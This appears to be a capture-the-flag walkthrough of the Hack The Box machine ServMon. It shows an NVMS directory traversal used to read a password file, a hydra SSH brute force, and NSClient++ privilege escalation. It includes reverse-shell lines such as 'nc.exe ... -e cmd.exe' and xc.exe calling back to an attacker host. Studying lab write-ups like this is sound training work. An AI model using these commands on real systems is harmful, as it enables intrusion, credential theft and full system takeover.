--- search: exclude: true --- # ServMon Writeup ![](img/45.png) ## Introduction : ServMon is an easy Windows box released back in April 2020. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → nmap -sCV 10.10.10.184 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:22 CEST Nmap scan report for 10.10.10.184 Host is up (0.053s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 5666/tcp open tcpwrapped 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.md | workers |_ jobs | http-title: NSClient++ |_Requested resource was /index.md | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8443-TCP:V=7.91%T=SSL%I=7%D=5/29%Time=60B25FA8%P=x86_64-pc-linux-gn SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1 SF:8\x7f\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x SF:2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\. SF:1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(R SF:TSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen SF:t\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length SF::\x2018\r\n\r\nDocument\x20not\x20found"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! |_smb2-time: ERROR: Script execution failed (use -d to debug) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 911.51 seconds [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → nmap -sCV -p21 10.10.10.184 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:43 CEST Nmap scan report for 10.10.10.184 Host is up (0.12s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM Users | ftp-syst: |_ SYST: Windows_NT Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up port 21 ftp with anonymous login allowed, so let's examine it: [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → wget -r ftp://anonymous:anonymous@10.10.10.184/ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → tree . └── 10.10.10.184 └── Users ├── Nadine │   └── Confidential.txt └── Nathan └── Notes to do.txt After downloading recursively everything there was in the ftp service, we get 2 potential usernames and 2 textfiles: [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → cat 10.10.10.184/Users/Nadine/Confidential.txt Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine% [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → cat 10.10.10.184/Users/Nathan/Notes\ to\ do.txt 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint% Our nmap scan also picked up port 80: ![](prg/45_002.png) Seems like we get a NVMS service, let's check if there are any exploits known for it: [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → searchsploit NVMS ------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------ --------------------------------- NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt OpenVms 5.3/6.2/7.x - UCX POP Server Arbi | multiple/local/21856.txt OpenVms 8.3 Finger Service - Stack Buffer | multiple/dos/32193.txt TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py ------------------------------------------ --------------------------------- [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → cat $(locate 47774.txt) # Title: NVMS-1000 - Directory Traversal # Date: 2019-12-12 # Author: Numan Türle # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html POC --------- GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1% Looks like NVMS1000 is vulnerable to Directory Traversal attacks, so let's test this: [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini --path-as-is ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 Following the note we found earlier, let's use that directory traversal vulnerability to get to Passwords.txt: [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$% [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is > passwords.txt Now with this we can use hydra to bruteforce the ssh passwords : [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → hydra -L users.txt -P passwords.txt ssh://10.10.10.184 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-29 19:23:59 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task [DATA] attacking ssh://10.10.10.184:22/ [22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-29 19:24:01 So let's SSH as the nadine user: [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → ssh nadine@10.10.10.184 The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established. ECDSA key fingerprint is SHA256:l00hI7FlitUwW9ndgFDHLzImSDNxQcjLOKxQPRmbzls. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.184' (ECDSA) to the list of known hosts. nadine@10.10.10.184's password: Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\Users\Nadine>dir Volume in drive C has no label. Volume Serial Number is DC93-6115 Directory of C:\Users\Nadine 08/04/2020 23:16 DIR> . 08/04/2020 23:16 DIR> .. 18/01/2020 11:23 DIR> 3D Objects 18/01/2020 11:23 DIR> Contacts 08/04/2020 22:28 DIR> Desktop 08/04/2020 22:28 DIR> Documents 18/01/2020 11:23 DIR> Downloads 08/04/2020 22:27 DIR> Favorites 08/04/2020 22:27 DIR> Links 18/01/2020 11:23 DIR> Music 18/01/2020 11:31 DIR> OneDrive 18/01/2020 11:23 DIR> Pictures 18/01/2020 11:23 DIR> Saved Games 18/01/2020 11:23 DIR> Searches 18/01/2020 11:23 DIR> Videos 0 File(s) 0 bytes 15 Dir(s) 6,097,006,592 bytes free nadine@SERVMON C:\Users\Nadine>type Desktop/user.txt The syntax of the command is incorrect. nadine@SERVMON C:\Users\Nadine>cd Desktop nadine@SERVMON C:\Users\Nadine\Desktop>dir Volume in drive C has no label. Volume Serial Number is DC93-6115 Directory of C:\Users\Nadine\Desktop ****08/04/2020 22:28 DIR> . 08/04/2020 22:28 DIR> .. 29/05/2021 16:31 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 6,097,006,592 bytes free nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt dbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get the user flag. ## **Part 3 : Getting Root Access** Now in order to get root access to this box, we're going to use WinPEAS to enumerate this box: [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon] → locate winPEAS.bat /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon] → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat . [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... nadine@SERVMON C:\Users\Nadine\Desktop>curl "http://10.10.14.13:9090/winPEAS.bat" --output peas.bat % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 35761 100 35761 0 0 35761 0 0:00:01 --:--:-- 0:00:01 247k nadine@SERVMON C:\Users\Nadine\Desktop>cmd /c peas.bat ` ![](prg/45_003.png) As we look for interesting stuff with the winpeas.bat output, we stumble upon NSClient++: ![](prg/45_004.png) So let's look for available exploits: [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon] → searchsploit nsclient++ ----------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------- --------------------------------- NSClient++ 0.5.2.35 - Authenticated Remo | json/webapps/48360.txt NSClient++ 0.5.2.35 - Privilege Escalati | windows/local/46802.txt ----------------------------------------- --------------------------------- Shellcodes: No Results Here we want the Privilege Escalation one: [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon] → cat $(46802.txt) 46802.txt: command not found ^[[A^C [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon] → cat $(locate 46802.txt) [...] Exploit: 1. Grab web administrator password - open c:\program files\nsclient++\nsclient.ini or - run the following that is instructed when you select forget password C:\Program Files\NSClient++>nscp web -- password --display Current password: SoSecret 2. Login and enable following modules including enable at startup and save configuration - CheckExternalScripts - Scheduler 3. Download nc.exe and evil.bat to c:\temp from attacking machine @echo off c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe 4. Setup listener on attacking machine nc -nlvvp 443 5. Add script foobar to call evil.bat and save settings - Settings > External Scripts > Scripts - Add New - foobar command = c:\temp\evil.bat 6. Add schedulede to call script every 1 minute and save settings - Settings > Scheduler > Schedules - Add new - foobar interval = 1m command = foobar 7. Restart the computer and wait for the reverse shell on attacking machine nc -nlvvp 443 listening on [any] 443 ... connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671 Microsoft Windows [Version 10.0.17134.753] (c) 2018 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami whoami nt authority\system We could follow the steps, but it is preferable to use the other script (48360.py) to automate this. So we're going to follow the first step: nadine@SERVMON C:\Users\Nadine\Desktop>powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr password password = ew2x6SsGTxjRwXOT And then, we're going to visit port 8443, that our nmap scan picked up as being NSClient++, however viewing the page from https://10.10.10.184:8443 will not allow us to login because only localhost is allowed as we can see from the config file: PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr 127 allowed hosts = 127.0.0.1 So we're going to make a SSH tunnel to the host to access it's localhost: [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon] → **ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184** nadine@10.10.10.184's password: **L1k3B1gBut7s@W0rk** Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\Users\Nadine> Now with the SSH tunnel, we can visit the website from it's localhost by going to **https://127.0.0.1:8443** using the **ew2x6SsGTxjRwXOT** password we found earlier: ![](prg/45_013.png) ![](prg/45_014.png) Once we are logged in, we're going to make sure that we can get a binary file to get a reverse shell from the box. And as i have discovered, HTB does not care about it's older retired boxes, and does not update them / fix them in case a problem like this happens: ![](prg/45_015.png) Literally every other writeup of this machine uses netcat (x86 or x64 versions) and yet it is not doable on this box. Therefore we need to get a binary file onto the box that will replicate what netcat does but at the same time bypassing whatever is preventing us from getting a reverse shell (privileged or not) from this box, although we could hypothesize that this box has flagged several of our netcat binaries, we can't know for sure. To do so we're going to use [xc](https://github.com/xct/xc) which is a golang version of netcat written by [xct](https://app.hackthebox.eu/profile/13569): [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon] → sudo apt install golang-go [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon] → git clone https://github.com/xct/xc ; cd xc [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon] → go version go version go1.15.9 linux/amd64 We first need go version 1.15+ to be able to compile the xc binary, then clone the xc repository, then we follow the setup steps on the README.md: [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc] → go get golang.org/x/sys/... [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc] → go get golang.org/x/text/encoding/unicode [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc] → go get github.com/hashicorp/yamux [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc] → go get github.com/ropnop/go-clr package github.com/ropnop/go-clr: build constraints exclude all Go files in /home/nothing/go/src/github.com/ropnop/go-clr [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc] → pip3 install donut-shellcode Collecting donut-shellcode Downloading donut-shellcode-0.9.2.tar.gz (149 kB) |████████████████████████████████| 149 kB 2.0 MB/s Building wheels for collected packages: donut-shellcode Building wheel for donut-shellcode (setup.py) ... done Created wheel for donut-shellcode: filename=donut_shellcode-0.9.2-cp39-cp39-linux_x86_64.whl size=56786 sha256=0e6037e945da6f8496c98bdb849a13ca84339af1ef50166a7480d6477d9729b8 Stored in directory: /home/nothing/.cache/pip/wheels/ac/72/45/1a77c4737812b5635cd958224c0ff623ebcef62c15ef083bab Successfully built donut-shellcode Installing collected packages: donut-shellcode Successfully installed donut-shellcode-0.9.2 [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc] → sudo apt install rlwrap upx -y [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc] → make [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc] → ls -lash | grep xc 1.3M -rwxr-xr-x 1 nothing nothing 1.3M May 30 14:03 xc 3.2M -rwxr-xr-x 1 nothing nothing 3.2M May 30 14:03 xc.exe 4.0K -rw-r--r-- 1 nothing nothing 2.7K May 30 14:03 xc.go [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc] → file xc xc.exe xc.go xc: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), statically linked, no section header xc.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows xc.go: C source, ASCII text So now we successfully compiled xc for both linux and windows, let's test the linux version: ![](prg/45_016.png) Looks like it is working locally, so let's test the windows version of xc on the box: [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon] → python3 -m http.server 9090 PS C:\Users\Nadine> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe PS C:\Users\Nadine> cd c:\temp PS C:\temp> ./xc.exe 10.10.14.13 9001 2021/05/30 13:59:45 Connected to 10.10.14.13:9001 [ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc] → ./xc -l -p 9001 __ _____ \ \/ / __| > <****(__ /_/\_\___| by @xct_de build: QUnVVFdLYEkibcKx 2021/05/30 14:51:44 Listening on :9001 2021/05/30 14:51:44 Waiting for connections... 2021/05/30 14:52:08 Connection from 10.10.10.184:56967 2021/05/30 14:52:08 Stream established [*] Auto-Plugins: [xc: C:\temp]: !shell Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\temp>whoami whoami servmon\nadine And we managed to get a reverse shell ! Although it's as the nadine user, so let's get one with the privesc exploit: PS C:\temp> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe [ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc] → ./xc -l -p 9001 [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon] → python3 48360.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "C:\Temp\xc.exe 10.10.14.13 9001" [ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc] → ./xc -l -p 9001 __ _____ \ \/ / __| > <****(__ /_/\_\___| by @xct_de build: QUnVVFdLYEkibcKx 2021/05/30 15:02:41 Listening on :9001 2021/05/30 15:02:41 Waiting for connections... 2021/05/30 15:03:08 Connection from 10.10.10.184:57375 2021/05/30 15:03:08 Stream established [*] Auto-Plugins: [xc: C:\Program Files\NSClient++]: !shell Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami whoami nt authority\system C:\Program Files\NSClient++>type C:\Users\Administrator\Desktop\root.txt type C:\Users\Administrator\Desktop\root.txt d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/45_graph.png)